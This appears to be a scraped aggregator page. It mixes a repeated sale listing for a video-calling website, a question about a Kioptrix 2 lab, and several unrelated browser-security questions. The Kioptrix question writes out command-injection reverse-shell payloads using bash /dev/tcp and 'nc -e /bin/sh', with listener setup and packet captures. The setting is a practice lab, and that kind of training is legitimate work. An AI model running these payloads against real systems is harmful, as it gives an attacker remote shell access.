Call Master – Free browser based video calling ( $10 Reserve )

Hi,
I want to sell my browser based video calling website.
The site: callmaster.live
Info:
Call Master is a Free browser based video calling site for everyone.
[Short Description]
Website does not generate income yet. The script is great and customizable. Owner can add ads to the video chat window to get hours of impressions per call.

[Best features]

  1. Site allows users to video call for free directly in the browser
  2. Website is easy to transfer with HEROKU:…

Call Master – Free browser based video calling ( $ 10 Reserve )

Kioptrix 2: Why netcat reverse shell executed in web browser via command injection bug doesn’t work?

I’ve completed kioptrix level 2 challenge via bash reverse shell.

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

; bash -i >& /dev/tcp/10.10.13.37/4444 0>&1 

My question is why netcat reverse shell executed in web browser via command injection bug doesn’t work when it was working just fine via terminal?

My Setup

Kali -  10.10.13.37 Kioptrix 2 - 10.10.13.254 

netcat listerner

kali@kali:~$   nc -lp 4444 

I’ve verified tcp port 4444 is open

kali@kali:~$   ss -antp | g 4444 LISTEN 0      1            0.0.0.0:4444         0.0.0.0:*     users:(("nc",pid=3003,fd=3))  kali@kali:~$    

netcat reverse shell executed in web browser via command injection bug doesn’t work

; nc 10.10.13.37 4444 ; nc 10.10.13.37 4444 -e /bin/sh 

No traffic at all

kali@kali:~$   sudo tcpdump -nni eth0 port 4444 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 

However, when I repeat the same process with netcat executed on Kioptrix 2 terminal, I was able to get the reverse shell setup on Kali.

[backdoor@kioptrix ~]$   nc 10.10.13.37 4444 -e /bin/sh 

Reverse shell via terminal is working fine

kali@kali:~$   nc -lp 4444 id uid=502(backdoor) gid=502(backdoor) groups=0(root),10(wheel),500(john),501(harold),502(backdoor) 

tcpdump traffic, the last 4 packets were for id command

kali@kali:~$   sudo tcpdump -nni eth0 port 4444 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 00:58:29.307806 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [S], seq 1943169723, win 5840, options [mss 1460,sackOK,TS val 12217959 ecr 0,nop,wscale 2], length 0 00:58:29.307851 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [S.], seq 869624996, ack 1943169724, win 65160, options [mss 1460,sackOK,TS val 714133810 ecr 12217959,nop,wscale 7], length 0 00:58:29.308412 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 1, win 1460, options [nop,nop,TS val 12217960 ecr 714133810], length 0  00:59:55.154330 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [P.], seq 1:4, ack 1, win 510, options [nop,nop,TS val 714219657 ecr 12217960], length 3 00:59:55.157180 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 4, win 1460, options [nop,nop,TS val 12303857 ecr 714219657], length 0 00:59:55.159646 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [P.], seq 1:98, ack 4, win 1460, options [nop,nop,TS val 12303859 ecr 714219657], length 97 00:59:55.159656 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [.], ack 98, win 510, options [nop,nop,TS val 714219662 ecr 12303859], length 0 

Call Master – Free browser based video calling

Hi,
I want to sell my browser based video calling website.
The site: callmaster.live
Info:
Call Master is a Free browser based video calling site for everyone.
[Short Description]
Website does not generate income yet. The script is great and customizable. Owner can add ads to the video chat window to get hours of impressions per call.

[Best features]

  1. Site allows users to video call for free directly in the browser
  2. Website is easy to transfer with HEROKU:…

Call Master – Free browser based video calling

Restricting website usage for Google Maps API doesn’t prevent it from being used in the browser?

Say I’ve restricted my Google Maps API key to the website abc.com/*. This would mean that no other website domains could use my API key to make requests to maps.googleapis.com.

However, using the API key through the browser url bar to make requests to maps.googleapis.com still works fine. Calls made through Postman also work.

What’s the explanation for this and is there an elegant way to prevent this?

Btw, I’m using the Maps Static & Javascript API. From my understanding both are client-side Maps API and called from the browser?

Would it be a big security vulnerability if someone wrote a browser extension to retrieve personal information on Google’s behalf?

I am a 6th grader working in a project and came across the following question:
On most browsers, you can inject JavaScript code into the browser, for example by typing in javascript:alert(‘Injecting javascript code’). On Google Chrome, if you do this on Google Drive, instead of the title being “drive.google.com says”, the title is “Google Drive”. Would this be a security threat in any way if someone wrote a malicious extension to ask for personal information on Google’s behalf?

Firefox: What would be more secure/private: storing session cookies or saving password in the browser?

I am wondering, assuming the latest version of Firefox, which of the following options would be more preferable security-wise (e.g. assess and/or password to user account will be stolen) and which one privacy-wise (exposing user to the least advertisement tracking etc.):

  1. Storing session cookies (i.e. logging in and never logging out), but not saving password & username in browser built-in Password Manager.
  2. Saving password & username in built-in Password Manager (without Master Password) and setting cookies and site data to be cleared when browser is closed.

P.S.: I am aware that using Master Password for password storage will increase security of the stored passwords. Though I am not wondering how to improve given options, but would like to asses them “as is”.

Browser Security Rescoures

I am looking for some new resources on browser security. I know about the book The Browser Hacker's Handbook as well as Browser Security Handbook by google but they seem to be pretty old considering that browsers have evolved a lot in recent years. I am comparatively new to this domain, don’t know how relevant they are now. Can you point me to some of the new resources. Thanks